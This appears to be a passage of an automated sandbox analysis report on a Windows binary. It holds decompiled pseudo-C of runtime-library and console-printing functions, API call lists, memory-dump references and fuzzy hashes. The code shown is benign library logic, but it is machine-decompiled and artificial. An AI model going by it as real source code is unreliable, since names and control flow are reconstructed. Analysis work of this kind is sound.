                                                										}
                                                										L36:
                                                										__edx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                										L39:
                                                										__eflags =  *(_t433 - 0x14);
                                                										if(__eflags == 0) {
                                                											E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                											E012312B0(0x1b, 0xc);
                                                											_push(0x124f918);
                                                											E0123715C(_t314, _t397, _t421, __eflags);
                                                											_t435 = _t435 + 4;
                                                											_t249 = E01232E80(_t314, _t365, __eflags, _t457);
                                                										}
                                                										__eflags =  *(_t433 - 0x28);
                                                										if( *(_t433 - 0x28) != 0) {
                                                											L85:
                                                											 *(_t433 - 0x28) = 0;
                                                										} else {
                                                											L42:
                                                											 *(_t433 - 8) = 0;
                                                											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                											while(1) {
                                                												L44:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                													break;
                                                												}
                                                												L45:
                                                												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                												_t391 =  *(_t433 - 0xc) - 1;
                                                												__eflags = _t391;
                                                												 *(_t433 - 0xc) = _t391;
                                                											}
                                                											L46:
                                                											 *(_t433 - 8) = 0;
                                                											while(1) {
                                                												L48:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if(__eflags >= 0) {
                                                													goto L50;
                                                												}
                                                												L49:
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												L47:
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												__eflags = _t322;
                                                												 *(_t433 - 8) = _t322;
                                                											}
                                                											goto L50;
                                                										}
                                                										goto L86;
                                                									case 3:
                                                										L37:
                                                										goto L87;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						L87:
                                                						return _t249;
                                                						L88:
                                                					}
                                                				}
                                                			}

































                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x0123347b
                                                0x01233481
                                                0x0123348a
                                                0x0123348d
                                                0x0123348d
                                                0x01233490
                                                0x01233493
                                                0x01233493
                                                0x01233499
                                                0x012334a2
                                                0x012334ad
                                                0x012334ae
                                                0x012334b3
                                                0x012334cc
                                                0x012334e2
                                                0x012334f0
                                                0x012334f5
                                                0x012334fa
                                                0x012334fd
                                                0x01233500
                                                0x01233505
                                                0x01233505
                                                0x0123350b
                                                0x0123350f
                                                0x01233510
                                                0x01233510
                                                0x01233515
                                                0x0123351e
                                                0x0123352c
                                                0x01233530
                                                0x0123353a
                                                0x0123353e
                                                0x01233548
                                                0x0123354c
                                                0x01233556
                                                0x0123355a
                                                0x0123355b
                                                0x01233560
                                                0x01233565
                                                0x0123356e
                                                0x01233571
                                                0x0123357e
                                                0x00000000
                                                0x01233573
                                                0x01233573
                                                0x01233579
                                                0x01233579
                                                0x01233583
                                                0x01233583
                                                0x01233587
                                                0x0123358a
                                                0x01233595
                                                0x01233595
                                                0x0123358c
                                                0x0123358c
                                                0x01233590
                                                0x01233593
                                                0x00000000
                                                0x00000000
                                                0x01233593
                                                0x0123359c
                                                0x012335a0
                                                0x012335a3
                                                0x012335a5
                                                0x012335a8
                                                0x012335ab
                                                0x012335ad
                                                0x012335ad
                                                0x012335ab
                                                0x012335b4
                                                0x012335b8
                                                0x012335bb
                                                0x01233361
                                                0x01233361
                                                0x01233366
                                                0x0123336a
                                                0x01233388
                                                0x0123338d
                                                0x01233392
                                                0x01233397
                                                0x0123336c
                                                0x01233370
                                                0x01233375
                                                0x0123337a
                                                0x0123337f
                                                0x0123337f
                                                0x0123339a
                                                0x0123339e
                                                0x012333a3
                                                0x012333a8
                                                0x012333ad
                                                0x012333b4
                                                0x012333b9
                                                0x012333cb
                                                0x012333cb
                                                0x012333cb
                                                0x012333cf
                                                0x00000000
                                                0x00000000
                                                0x012333d1
                                                0x012333d1
                                                0x012333d6
                                                0x012333db
                                                0x012333e0
                                                0x012333c2
                                                0x012333c5
                                                0x012333c5
                                                0x012333c8
                                                0x012333c8
                                                0x012333e5
                                                0x012333e5
                                                0x012333e9
                                                0x012333eb
                                                0x012333f1
                                                0x012333ff
                                                0x012333ff
                                                0x012333ff
                                                0x01233403
                                                0x00000000
                                                0x00000000
                                                0x01233405
                                                0x0123340b
                                                0x01233422
                                                0x01233422
                                                0x01233422
                                                0x01233424
                                                0x012333f6
                                                0x012333f9
                                                0x012333f9
                                                0x012333fc
                                                0x012333fc
                                                0x01233427
                                                0x01233427
                                                0x01233439
                                                0x01233439
                                                0x0123343c
                                                0x0123343f
                                                0x00000000
                                                0x00000000
                                                0x01233441
                                                0x01233447
                                                0x01233458
                                                0x01233458
                                                0x01233458
                                                0x0123345a
                                                0x01233430
                                                0x01233433
                                                0x01233433
                                                0x01233436
                                                0x01233436
                                                0x01233439
                                                0x0123345d
                                                0x01233460
                                                0x01233463
                                                0x01233465
                                                0x01233465
                                                0x0123346c
                                                0x0123346f
                                                0x01233472
                                                0x0123348d
                                                0x01233490
                                                0x01233493
                                                0x01233493
                                                0x00000000
                                                0x01233493
                                                0x012335c1
                                                0x012335c1
                                                0x012335c5
                                                0x012335c8
                                                0x00000000
                                                0x00000000
                                                0x012335ce
                                                0x012335ce
                                                0x012335d2
                                                0x012335d5
                                                0x00000000
                                                0x00000000
                                                0x012335db
                                                0x012335e4
                                                0x012335e4
                                                0x012335e9
                                                0x012335eb
                                                0x00000000
                                                0x00000000
                                                0x01232ee9
                                                0x01232ee9
                                                0x01232ef0
                                                0x01232ef7
                                                0x01232efe
                                                0x01232f0f
                                                0x01232f14
                                                0x01232f17
                                                0x01232f1c
                                                0x01232f1c
                                                0x01232f29
                                                0x01232f37
                                                0x01232f45
                                                0x01232f55
                                                0x01232f5c
                                                0x01232f61
                                                0x01232f67
                                                0x00000000
                                                0x00000000
                                                0x01232f69
                                                0x01232f73
                                                0x01232f78
                                                0x01232f7b
                                                0x01232f80
                                                0x01232f80
                                                0x01232f83
                                                0x01232f87
                                                0x01232f91
                                                0x01232f98
                                                0x01232f9d
                                                0x01232fa3
                                                0x00000000
                                                0x00000000
                                                0x01232fa5
                                                0x01232fb3
                                                0x01232fb8
                                                0x01232fbd
                                                0x01232fc5
                                                0x01232fc5
                                                0x01232fc8
                                                0x01232fca
                                                0x01232fca
                                                0x01232fcf
                                                0x01232fd0
                                                0x01232fd5
                                                0x01232fd5
                                                0x01232fdd
                                                0x01232fe0
                                                0x01232fe3
                                                0x01232fe9
                                                0x01232fea
                                                0x01232ff2
                                                0x01232ffb
                                                0x01233000
                                                0x01233005
                                                0x01233011
                                                0x01233016
                                                0x0123301b
                                                0x01233027
                                                0x0123302c
                                                0x01233031
                                                0x0123303d
                                                0x01233042
                                                0x01233047
                                                0x0123304c
                                                0x01233053
                                                0x01233058
                                                0x0123306a
                                                0x0123306a
                                                0x0123306a
                                                0x0123306e
                                                0x00000000
                                                0x00000000
                                                0x01233070
                                                0x01233070
                                                0x01233075
                                                0x0123307a
                                                0x01233064
                                                0x01233064
                                                0x01233067
                                                0x01233067
                                                0x0123307f
                                                0x01233083
                                                0x01233088
                                                0x0123308d
                                                0x01233092
                                                0x01233095
                                                0x0123309c
                                                0x0123309f
                                                0x012330a2
                                                0x012330ab
                                                0x012330b4
                                                0x012330b7
                                                0x012330bb
                                                0x0123327b
                                                0x0123327b
                                                0x01233284
                                                0x01233289
                                                0x0123328e
                                                0x0123329a
                                                0x0123329f
                                                0x012332a4
                                                0x012332a9
                                                0x012332ac
                                                0x00000000
                                                0x012330c1
                                                0x012330c1
                                                0x012330c4
                                                0x00000000
                                                0x012330cb
                                                0x012330cf
                                                0x012330d4
                                                0x012330d9
                                                0x012330e1
                                                0x012330ea
                                                0x012330ef
                                                0x012330f2
                                                0x01233104
                                                0x01233104
                                                0x01233107
                                                0x0123310a
                                                0x00000000
                                                0x00000000
                                                0x0123310c
                                                0x01233119
                                                0x0123311e
                                                0x01233123
                                                0x01233126
                                                0x01233128
                                                0x01233130
                                                0x01233141
                                                0x01233141
                                                0x01233141
                                                0x01233143
                                                0x01233147
                                                0x01233147
                                                0x0123314a
                                                0x0123314a
                                                0x012330fe
                                                0x012330fe
                                                0x01233101
                                                0x01233101
                                                0x0123314f
                                                0x0123314f
                                                0x01233152
                                                0x00000000
                                                0x00000000
                                                0x0123315a
                                                0x0123315a
                                                0x0123315e
                                                0x01233163
                                                0x01233168
                                                0x0123316d
                                                0x01233170
                                                0x01233181
                                                0x0123318a
                                                0x0123318c
                                                0x01233196
                                                0x0123319b
                                                0x012331a0
                                                0x012331a5
                                                0x012331a5
                                                0x012331a8
                                                0x012331b1
                                                0x012331b1
                                                0x012331b5
                                                0x012331b8
                                                0x012331b9
                                                0x012331be
                                                0x012331c5
                                                0x012331d7
                                                0x012331d7
                                                0x012331d7
                                                0x012331da
                                                0x012331dd
                                                0x00000000
                                                0x00000000
                                                0x012331df
                                                0x012331df
                                                0x012331e6
                                                0x012331e9
                                                0x012331ec
                                                0x012331f1
                                                0x012331f9
                                                0x012331fb
                                                0x01233200
                                                0x01233203
                                                0x01233209
                                                0x0123320c
                                                0x0123320f
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233216
                                                0x01233217
                                                0x0123321a
                                                0x0123321a
                                                0x0123321d
                                                0x0123321d
                                                0x012331ce
                                                0x012331d1
                                                0x012331d1
                                                0x012331d4
                                                0x012331d4
                                                0x01233222
                                                0x01233222
                                                0x01233225
                                                0x00000000
                                                0x00000000
                                                0x0123322d
                                                0x0123322d
                                                0x0123323f
                                                0x0123323f
                                                0x0123323f
                                                0x01233242
                                                0x01233245
                                                0x00000000
                                                0x00000000
                                                0x01233247
                                                0x0123324a
                                                0x0123324d
                                                0x01233253
                                                0x01233256
                                                0x01233259
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x01233260
                                                0x01233261
                                                0x01233264
                                                0x01233267
                                                0x01233236
                                                0x01233239
                                                0x01233239
                                                0x0123323c
                                                0x0123323c
                                                0x0123326c
                                                0x0123326c
                                                0x0123326f
                                                0x012332b3
                                                0x012332b3
                                                0x012332b7
                                                0x012332b9
                                                0x012332c2
                                                0x012332c7
                                                0x012332cc
                                                0x012332d1
                                                0x012332d4
                                                0x012332d4
                                                0x012332d9
                                                0x012332dd
                                                0x012335dd
                                                0x012335dd
                                                0x012332e3
                                                0x012332e3
                                                0x012332e3
                                                0x012332f0
                                                0x01233307
                                                0x01233307
                                                0x0123330a
                                                0x0123330d
                                                0x00000000
                                                0x00000000
                                                0x0123330f
                                                0x01233315
                                                0x01233326
                                                0x01233326
                                                0x01233326
                                                0x01233328
                                                0x012332f8
                                                0x012332fb
                                                0x01233301
                                                0x01233301
                                                0x01233304
                                                0x01233304
                                                0x0123332b
                                                0x0123332b
                                                0x0123333d
                                                0x0123333d
                                                0x01233340
                                                0x01233343
                                                0x00000000
                                                0x00000000
                                                0x01233345
                                                0x0123334b
                                                0x0123335c
                                                0x0123335c
                                                0x0123335c
                                                0x0123335e
                                                0x01233334
                                                0x01233337
                                                0x01233337
                                                0x0123333a
                                                0x0123333a
                                                0x00000000
                                                0x0123333d
                                                0x00000000
                                                0x00000000
                                                0x01233274
                                                0x00000000
                                                0x00000000
                                                0x012330c4
                                                0x00000000
                                                0x012330bb
                                                0x012335f1
                                                0x012335f6
                                                0x00000000
                                                0x012335f6
                                                0x0123348d

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 012334B3
                                                • _wprintf.LIBCMT ref: 01233560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition
                                                • String ID: %d.$%s%s%s%s
                                                • API String ID: 3459578117-4028964860
                                                • Opcode ID: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction ID: 0ce7d7aad8782f8f870fb39d6a6a73441fda7a7f3df5374d2e50e912b325e93b
                                                • Opcode Fuzzy Hash: 35bfc59a491c3d1461725748e18d34aace066e60186c68588ac93b7c2777ad19
                                                • Instruction Fuzzy Hash: E3415EB1E1404BAFCF18CB88D5D1ABEBBB6FBD5304F558199D101AB285DA309A45CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E01241673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				signed int _v20;
                                                				void* __edi;
                                                				signed int _t35;
                                                				int _t38;
                                                				intOrPtr* _t44;
                                                				int _t47;
                                                				short* _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t54;
                                                				int _t55;
                                                				void* _t57;
                                                				signed int _t59;
                                                				char* _t62;
                                                
                                                				_t62 = _a8;
                                                				if(_t62 == 0) {
                                                					L5:
                                                					return 0;
                                                				}
                                                				_t50 = _a12;
                                                				if(_t50 == 0) {
                                                					goto L5;
                                                				}
                                                				if( *_t62 != 0) {
                                                					_push(_t57);
                                                					E01237857( &_v20, _t57, _a16);
                                                					_t35 = _v20;
                                                					__eflags =  *(_t35 + 0xa8);
                                                					if( *(_t35 + 0xa8) != 0) {
                                                						_t38 = E0124124B( *_t62 & 0x000000ff,  &_v20);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							__eflags = _a4;
                                                							_t59 = 1;
                                                							_t28 = _v20 + 4; // 0x20432f41
                                                							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                							if(__eflags != 0) {
                                                								L21:
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t31 = _t54 + 0x70;
                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t31;
                                                								}
                                                								return _t59;
                                                							}
                                                							L20:
                                                							_t44 = E01238EFF(__eflags);
                                                							_t59 = _t59 | 0xffffffff;
                                                							__eflags = _t59;
                                                							 *_t44 = 0x2a;
                                                							goto L21;
                                                						}
                                                						_t59 = _v20;
                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                						if( *(_t59 + 0x74) <= 1) {
                                                							L15:
                                                							_t20 = _t59 + 0x74; // 0x3a202020
                                                							__eflags = _t50 -  *_t20;
                                                							L16:
                                                							if(__eflags < 0) {
                                                								goto L20;
                                                							}
                                                							__eflags = _t62[1];
                                                							if(__eflags == 0) {
                                                								goto L20;
                                                							}
                                                							L18:
                                                							_t22 = _t59 + 0x74; // 0x3a202020
                                                							_t59 =  *_t22;
                                                							goto L21;
                                                						}
                                                						_t12 = _t59 + 0x74; // 0x3a202020
                                                						__eflags = _t50 -  *_t12;
                                                						if(__eflags < 0) {
                                                							goto L16;
                                                						}
                                                						__eflags = _a4;
                                                						_t17 = _t59 + 0x74; // 0x3a202020
                                                						_t18 = _t59 + 4; // 0x20432f41
                                                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                						_t59 = _v20;
                                                						__eflags = _t47;
                                                						if(_t47 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t55 = _a4;
                                                					__eflags = _t55;
                                                					if(_t55 != 0) {
                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                					}
                                                					_t59 = 1;
                                                					goto L21;
                                                				}
                                                				_t49 = _a4;
                                                				if(_t49 != 0) {
                                                					 *_t49 = 0;
                                                				}
                                                				goto L5;
                                                			}


















                                                0x0124167b
                                                0x01241680
                                                0x0124169a
                                                0x00000000
                                                0x0124169a
                                                0x01241682
                                                0x01241687
                                                0x00000000
                                                0x00000000
                                                0x0124168c
                                                0x012416a0
                                                0x012416a7
                                                0x012416ac
                                                0x012416af
                                                0x012416b6
                                                0x012416d5
                                                0x012416dc
                                                0x012416de
                                                0x01241722
                                                0x0124172a
                                                0x01241736
                                                0x0124173f
                                                0x01241741
                                                0x01241751
                                                0x01241751
                                                0x01241755
                                                0x01241757
                                                0x0124175a
                                                0x0124175a
                                                0x0124175a
                                                0x0124175a
                                                0x00000000
                                                0x01241760
                                                0x01241743
                                                0x01241743
                                                0x01241748
                                                0x01241748
                                                0x0124174b
                                                0x00000000
                                                0x0124174b
                                                0x012416e0
                                                0x012416e3
                                                0x012416e7
                                                0x01241710
                                                0x01241710
                                                0x01241710
                                                0x01241713
                                                0x01241713
                                                0x00000000
                                                0x00000000
                                                0x01241715
                                                0x01241719
                                                0x00000000
                                                0x00000000
                                                0x0124171b
                                                0x0124171b
                                                0x0124171b
                                                0x00000000
                                                0x0124171b
                                                0x012416e9
                                                0x012416e9
                                                0x012416ec
                                                0x00000000
                                                0x00000000
                                                0x012416f0
                                                0x012416fa
                                                0x01241700
                                                0x01241703
                                                0x01241709
                                                0x0124170c
                                                0x0124170e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0124170e
                                                0x012416b8
                                                0x012416bb
                                                0x012416bd
                                                0x012416c2
                                                0x012416c2
                                                0x012416c7
                                                0x00000000
                                                0x012416c7
                                                0x0124168e
                                                0x01241693
                                                0x01241697
                                                0x01241697
                                                0x00000000

                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012416A7
                                                • __isleadbyte_l.LIBCMT ref: 012416D5
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241703
                                                • MultiByteToWideChar.KERNEL32(20432F41,00000009,?,00000001,00000000,00000000,?,00000000,?,?,0124FF04,?,00000000), ref: 01241739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction ID: ce199ebaf941c399e275516d9836581e1e6676c0bfd5b2e6bcbeabcea774ca07
                                                • Opcode Fuzzy Hash: 4ea13e41c4326518021bdc160fdea954d8357356850a0f07fd6c8b73935f2dd7
                                                • Instruction Fuzzy Hash: 8D31A431620217AFDB2EDE78C845B7A7FB5FF41250F194418E66487190D770F4A1DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123ECB1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E0123F1FE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					_t35 = _t25 - 0x66;
                                                					if(_t25 != 0x66) {
                                                						__eflags = _t25 - 0x61;
                                                						if(_t25 == 0x61) {
                                                							L7:
                                                							_t26 = E0123ED37(_a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							__eflags = _t25 - 0x41;
                                                							if(__eflags == 0) {
                                                								goto L7;
                                                							} else {
                                                								_t26 = E0123F473(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                							}
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E0123F3B4(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}





                                                0x0123ecb4
                                                0x0123ecba
                                                0x0123ed2d
                                                0x00000000
                                                0x0123ecc1
                                                0x0123ecc1
                                                0x0123ecc4
                                                0x0123ecdf
                                                0x0123ece2
                                                0x0123ed02
                                                0x0123ed14
                                                0x0123ece4
                                                0x0123ece4
                                                0x0123ece7
                                                0x00000000
                                                0x0123ece9
                                                0x0123ecfb
                                                0x0123ecfb
                                                0x0123ece7
                                                0x0123ed32
                                                0x0123ed36
                                                0x0123ecc6
                                                0x0123ecde
                                                0x0123ecde
                                                0x0123ecc4

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction ID: bc1ba196169972caf36ed79b812752295c6241e0107106cc27b9a04a67d3bfea
                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction Fuzzy Hash: E8014CB246014EFBCF125F88DC45CEE3F26BB99254B5A8815FF1858130D336C9B5AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0123CC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				LONG* _t20;
                                                				signed int _t25;
                                                				void* _t31;
                                                				LONG* _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                
                                                				_t35 = __eflags;
                                                				_t29 = __edx;
                                                				_t24 = __ebx;
                                                				_push(0xc);
                                                				_push(0x124d9a0);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t31 = E0123D59F(__edx, __edi, _t35);
                                                				_t25 =  *0x1251c6c; // 0xfffffffe
                                                				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                					E0123BE5F(0xd);
                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                					_t33 =  *(_t31 + 0x68);
                                                					 *(_t34 - 0x1c) = _t33;
                                                					__eflags = _t33 -  *0x1251524; // 0xa64750
                                                					if(__eflags != 0) {
                                                						__eflags = _t33;
                                                						if(__eflags != 0) {
                                                							__eflags = InterlockedDecrement(_t33);
                                                							if(__eflags == 0) {
                                                								__eflags = _t33 - 0x1251820;
                                                								if(__eflags != 0) {
                                                									E01238F53(_t33);
                                                								}
                                                							}
                                                						}
                                                						_t20 =  *0x1251524; // 0xa64750
                                                						 *(_t31 + 0x68) = _t20;
                                                						_t33 =  *0x1251524; // 0xa64750
                                                						 *(_t34 - 0x1c) = _t33;
                                                						InterlockedIncrement(_t33);
                                                					}
                                                					 *(_t34 - 4) = 0xfffffffe;
                                                					E0123CCAC();
                                                				} else {
                                                					_t33 =  *(_t31 + 0x68);
                                                				}
                                                				_t38 = _t33;
                                                				if(_t33 == 0) {
                                                					E0123751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                				}
                                                				return E012391A5(_t33);
                                                			}









                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc10
                                                0x0123cc12
                                                0x0123cc17
                                                0x0123cc21
                                                0x0123cc23
                                                0x0123cc2c
                                                0x0123cc4d
                                                0x0123cc53
                                                0x0123cc57
                                                0x0123cc5a
                                                0x0123cc5d
                                                0x0123cc63
                                                0x0123cc65
                                                0x0123cc67
                                                0x0123cc70
                                                0x0123cc72
                                                0x0123cc74
                                                0x0123cc7a
                                                0x0123cc7d
                                                0x0123cc82
                                                0x0123cc7a
                                                0x0123cc72
                                                0x0123cc83
                                                0x0123cc88
                                                0x0123cc8b
                                                0x0123cc91
                                                0x0123cc95
                                                0x0123cc95
                                                0x0123cc9b
                                                0x0123cca2
                                                0x0123cc34
                                                0x0123cc34
                                                0x0123cc34
                                                0x0123cc37
                                                0x0123cc39
                                                0x0123cc3d
                                                0x0123cc42
                                                0x0123cc4a

                                                APIs
                                                  • Part of subcall function 0123D59F: __getptd_noexit.LIBCMT ref: 0123D5A0
                                                • __lock.LIBCMT ref: 0123CC4D
                                                • InterlockedDecrement.KERNEL32(?), ref: 0123CC6A
                                                • _free.LIBCMT ref: 0123CC7D
                                                • InterlockedIncrement.KERNEL32(00A64750), ref: 0123CC95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 2704283638-0
                                                • Opcode ID: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction ID: 099c9ac3995efe6e602a3e31623a3be9aead9fa77135d7cb14737d78d3cbcf89
                                                • Opcode Fuzzy Hash: 0883352c0a925fba824aecee48a8a3fa1e3832efe549e7a585efaf45a44da2d9
                                                • Instruction Fuzzy Hash: 4D01D6B6A20B139BDB3AAF6DB0483AD77A0BFC4710F04440ADA1477280CB349961CFD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01231B30(intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				char _v45;
                                                				short _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v64;
                                                				intOrPtr _v68;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v92;
                                                				char _v167;
                                                				char _v168;
                                                				signed int _t163;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				void* _t186;
                                                				intOrPtr _t189;
                                                				void* _t292;
                                                				void* _t293;
                                                				void* _t294;
                                                
                                                				_v64 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v45 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v168 = 0;
                                                				_t163 = E012387A0( &_v167, 0, 0x31);
                                                				_t294 = _t293 + 0xc;
                                                				asm("cvttsd2si eax, [ebp+0x8]");
                                                				_v16 = _t163;
                                                				asm("cdq");
                                                				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                				asm("cdq");
                                                				_v16 = _v16 / 0x3e8;
                                                				_v8 = 4;
                                                				while(_v8 >= 0) {
                                                					asm("cdq");
                                                					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                					asm("cdq");
                                                					_v16 = _v16 / 0x64;
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                				asm("cdq");
                                                				_v20 = _v36 / 0x64;
                                                				asm("cdq");
                                                				_v12 = _v36 % 0x64;
                                                				asm("cdq");
                                                				_v40 = _v12 / 0xa;
                                                				_t177 = _v12;
                                                				asm("cdq");
                                                				_t178 = _t177 / 0xa;
